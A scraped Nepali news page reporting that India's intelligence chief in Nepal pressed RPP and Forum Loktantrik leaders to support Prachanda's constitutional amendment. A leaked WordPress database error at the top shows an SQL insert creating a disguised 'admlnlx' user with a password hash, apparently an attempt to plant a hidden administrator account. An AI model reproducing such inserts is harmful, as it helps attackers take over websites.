WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BziEBtKOZd4WsR7teHFmt5UuS6nhND/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 23:22:23', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ १-
केपी ओली नेतृत्वको पूर्ववर्ती सरकारमा उपप्रधान सहित परराष्ट्रमन्त्री रहेका कमल थापालाई भारतीय गुप्तचर संस्थाले वारम्वार दबाब दिएको थाहा हुन आएको छ ।सरकारले हालै मात्र टेवल गरेको संविधान संशोधनको पक्षमा प्रचण्ड सरकारलाई साथ दिन भारतीय गुप्तचर संस्थाका नेपाल प्रमुखले राप्रपा अध्यक्षलाई दबाब दिएका हुन ।
पछिल्लो एक सातायता रअका नेपाल प्रमुख विवेक जाहेरीले राप्रपा अध्यक्ष कमल थापा देखि विजय गच्छदारसम्मलाई भेटेर संविधान संशोधनको पक्षमा प्रचण्ड नेतृत्वको सरकारलाई सघाउन दबाब दिइरहेको तथ्य प्रकाशमा आएको छ ।राप्रपा निकट स्रोतका अनुसार पछिल्लो दुई सातामा जाहेरीले राप्रपाका केही नेताहरुबीच बाक्लै भेटवार्ता चलिरहेको छ । यस्तै भेटवार्तामा फोरम लोकतान्त्रिकका अध्यक्ष विजयकुमार गच्छदारलाई पनि सहभागि गराइएको छ ।
प्रधानमन्त्री दाहाल अहिले २ मन्त्रालय मात्रै लिएर सरकारमा रहेको राप्रपालाई संविधान संशोधनमा सघाउने उद्धेश्य अनुरुप थप तीन मन्त्रालय सहित उपप्रधानमन्त्री दिएर सरकार विस्तार गर्ने तयारीमा छन् । यसका साथै संसदमा १४ सिट रहेको मधेसी जनअधिकार फोरम लोकतान्त्रिकलाई पनि उपप्रधानमन्त्री सहित दुई मन्त्रालय दिएर सरकारमा ल्याउने गृहकार्य दाहालले अघि बढाएका हुन् ।
दाहालले सरकार विस्तारको गृहकार्य अघि बढाएको खुलासा गरेको एक दिन अघि मंगलवार फोरम लोकतान्त्रिकका अध्यक्ष विजयकुमार गच्छदार भारतीय दूतावासमा आयोजित ‘हिन्दी दिवस’को समारोहमा सहभागि भएका थिए ।
यसकाठमाण्डौवाट साभार